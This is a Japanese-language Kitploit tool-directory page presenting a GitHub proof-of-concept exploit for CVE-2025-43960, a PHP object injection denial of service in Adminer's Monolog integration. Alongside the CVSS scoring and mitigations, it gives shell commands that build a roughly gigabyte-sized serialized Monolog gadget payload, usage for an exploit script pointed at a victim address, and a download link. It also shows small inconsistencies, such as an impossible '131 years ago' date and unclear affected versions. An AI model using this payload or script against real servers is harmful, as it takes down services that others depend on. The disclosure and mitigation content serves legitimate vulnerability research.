Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-43960 — Adminer <4.8.1のMonologを介したPHPオブジェクトインジェクションエクスプロイト。巧妙に細工されたシリアライズペイロードによりサービス拒否を引き起こす。PoC、CVSSスコア、緩和策のガイダンスを含む。 | Kitploit
ツール/GitHubGitHub/far00t01/cve-2025-43960
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

Adminer <4.8.1のMonologを介したPHPオブジェクトインジェクションエクスプロイト。巧妙に細工されたシリアライズペイロードによりサービス拒否を引き起こす。PoC、CVSSスコア、緩和策のガイダンスを含む。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-43960 - Adminer < 4.8.1 における Monolog 経由の PHP オブジェクトインジェクション - サービス拒否 (DoS)

MITRE からの回答を数ヶ月待った後、Adminer サービス (<4.8.1) に対する PHP オブジェクトインジェクション攻撃により、メモリ操作を介したサービス拒否 (DoS) を引き起こす CVE-2025-43960 を取得しました。

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

概要

この脆弱性により、リモートの未認証の攻撃者は、Monolog を使用する Adminer 4.8.1 インスタンスを悪用し、PHP オブジェクトインジェクションを介してサービス拒否 (DoS) を引き起こすことができます。 攻撃ベクトルは認証やユーザー操作を必要としないため、これは高深刻度の問題 (CVSS 7.5) であり、特定の共有環境では 8.6 にまで悪化する可能性があります。

推奨される説明

Adminer 4.8.1 で Monolog を使用したログ記録を行っている場合、s:1000000000 のような文字列を持つ巧妙に細工されたシリアル化ペイロード (いわゆる PHP オブジェクトインジェクション問題) によって、サービス拒否 (メモリ消費) が引き起こされます。この脆弱性は、ログ記録に Monolog を使用する Adminer インスタンスに影響し、信頼できないユーザー入力が適切な検証なしにデシリアライズされます。 大きなデシリアライズされたオブジェクトを送信することで、攻撃者は高いメモリ消費を強制し、Adminer インターフェイスを応答不能にし、サーバー全体の DoS を引き起こす可能性があります。

  • サーバーは数分後に回復する可能性がありますが、複数の同時リクエストにより完全なクラッシュが発生し、サービスを復旧するには手動の介入が必要になる場合があります。

CVSS スコア v3.1

基本スコア: 7.5 (High)
ベクター: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

特定のデプロイに関する注意:

Adminer のクラッシュが他のサービス/テナント (例: コンテナや共有プロセス) にも影響を与える場合、スコープ: 変更 が適用される可能性があります:

  • ベクター: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • スコア: 8.6 (High)

追加情報

潜在的な緩和策

  • Adminer および Monolog 内で信頼できないデータに対して unserialize() を使用しない。
  • PHP でメモリ制限 (memory_limit) を適用し、過剰なリソース消費を防ぐ。
  • unserialize() で allowed_classes を使用して、許可されていないクラスのデシリアライズを制限する。

製品のベンダー

  • Adminer

影響を受ける製品コードベース

  • Adminer < 4.8.1 (テスト時点での最新安定版)

影響を受けるコンポーネント

  • Adminer の Monolog 統合

問題のある機能

  • unserialize() を介した PHP オブジェクトインジェクション

潜在的な影響範囲

  • Monolog ベースのログ記録が使用されているすべての Adminer インスタンス

概念実証 (PoC)

ペイロードの生成:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

影響:

  • サーバーがロード状態になり、Adminer にアクセスできなくなる。
  • 接続がアクティブな間、フロントエンドが完全に表示されなくなる。
  • 攻撃が停止すると、サーバーは数分後に回復する (複数のマシンを使用した DDoS シナリオでなければ)。

インストール要件

  • Python: Python 3.x がインストールされていることを確認してください。ターミナルで python3 --version を実行して確認できます。

Python 依存関係

  • Flask: ペイロードを提供するローカル HTTP サーバーの実行に使用されます。
  • requests: エクスプロイトプロセス中にターゲットアプリケーションと対話するために使用されます。

インストール

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

エクスプロイトの使用方法:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

参考文献

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

発見者

Fabian Rosales (@far00t01) Medium

ツールをダウンロード